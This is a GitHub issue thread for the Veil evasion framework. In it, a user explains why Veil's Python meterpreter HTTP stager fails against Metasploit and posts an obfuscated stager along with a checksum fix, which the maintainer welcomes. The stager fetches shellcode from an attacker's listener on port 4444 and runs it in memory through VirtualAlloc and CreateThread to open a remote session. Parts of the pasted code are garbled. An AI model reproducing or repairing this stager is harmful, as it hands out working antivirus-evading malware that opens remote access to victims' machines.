Veil-Framework / Veil

Veil 3.1.X (Check version info in Veil at runtime)
GNU General Public License v3.0
3.96k stars 879 forks source link

python/meterpreter/rev_http &python/meterpreter/rev_https stager url is not recognised by listner. #418

Open pythonart opened 3 years ago

pythonart commented 3 years ago

Veil version

Veil | [Version]: 3.1.14

OS Used - all info (architecture, linux flavor, etc)

Linux 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux

How did you install Veil? (Apt, Clone from Github, etc.)


Did you run the setup script?


Pastebin link to error you are encountering (include console actions you took prior to error)

Expected behavior

Sucessfull uploading of stager & followed by windows meterpreter session on attack machine.

Any additional info you want to tell me

image image image

pythonart commented 3 years ago

I was able to identify the issue by referring to metasploits code at lib/rex/payloads/meterpreter/uri_checksum.rb Basically, Metasploit now requires a checksum of at least 40 characters. Hence as a quick fix i modified the payload as below. for GSRBCheNtxSd = ''.join(random.sample(string.ascii_letters + string.digits,50)) to use 50 digits instead of 3 to generate a check sum.

import urllib.request, string, random, ctypes as gWBruXFY

def mxpzRtVtg(s): return sum([ord(ch) for ch in s]) % 0x100
def zXchxRKil():
    for x in range(64):
        GSRBCheNtxSd = ''.join(random.sample(string.ascii_letters + string.digits,**50**))
        BbpKiVAkCKA = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
        for vddmbn in BbpKiVAkCKA:
            if mxpzRtVtg(GSRBCheNtxSd + vddmbn) == 92: return GSRBCheNtxSd + vddmbn
def LlceZjXpOsmpECO(zXjfwOXx, XPpqPxgpQIzbk):
    DHSKoMgpytS = urllib.request.ProxyHandler({})
    uDfJcx = urllib.request.build_opener(DHSKoMgpytS)
    BujmkFRSdXQ = urllib.request.Request("http://" + zXjfwOXx + ":" + str(XPpqPxgpQIzbk) + "/" + zXchxRKil(), None, {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'})
    #BujmkFRSdXQ = urllib.request.Request("http://" + zXjfwOXx + ":" + str(XPpqPxgpQIzbk) + "/" + AAAAA, None, {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'})

        OgWAtgNFNeTXzB = urllib.request.urlopen(BujmkFRSdXQ)
            if int(["Content-Length"]) > 100000: return
            else: return ''
        except: return
    except urllib.request.URLError:
        return ''
def gzzEVGFKdQcsY(ozgjuhs):
    if ozgjuhs != "":
        ImvVOrRoqWIWK = bytearray(ozgjuhs)
        tPeTLiESurd = gWBruXFY.windll.kernel32.VirtualAlloc(gWBruXFY.c_int(0),gWBruXFY.c_int(len(ImvVOrRoqWIWK)), gWBruXFY.c_int(0x3000),gWBruXFY.c_int(0x40))
        tUIenYmsHfAiPZa = (gWBruXFY.c_char * len(ImvVOrRoqWIWK)).from_buffer(ImvVOrRoqWIWK)
        gWBruXFY.windll.kernel32.RtlMoveMemory(gWBruXFY.c_int(tPeTLiESurd),tUIenYmsHfAiPZa, gWBruXFY.c_int(len(ImvVOrRoqWIWK)))
        vHhSRkfqcncViN = gWBruXFY.windll.kernel32.CreateThread(gWBruXFY.c_int(0),gWBruXFY.c_int(0),gWBruXFY.c_int(tPeTLiESurd),gWBruXFY.c_int(0),gWBruXFY.c_int(0),gWBruXFY.pointer(gWBruXFY.c_int(0)))
sjWtpZKZ = ''
sjWtpZKZ = LlceZjXpOsmpECO("", 4444)

Suggest the source code for below be modified to match lib/rex/payloads/meterpreter/uri_checksum.rb URI generator methord. Veil/tools/evasion/payloads/python/meterpreter/ / Veil/tools/evasion/payloads/python/meterpreter/ /

Temporary fix would be to change below line and modify the value 3 to any number more than 40. payload_code += '\t' * num_tabs_required + "\t\t" + randBaseName + " = ''.join(random.sample(string.ascii_letters + string.digits,3))\n"

ChrisTruncer commented 3 years ago

Hey, thanks for sending this patch over. Appreciate it! Any chance you want to submit it as a pull request just to you get the credit?

pythonart commented 3 years ago

Hi Chris, I am not familiar with submissions. Kindly do it for me. I am not keen on getting the credit.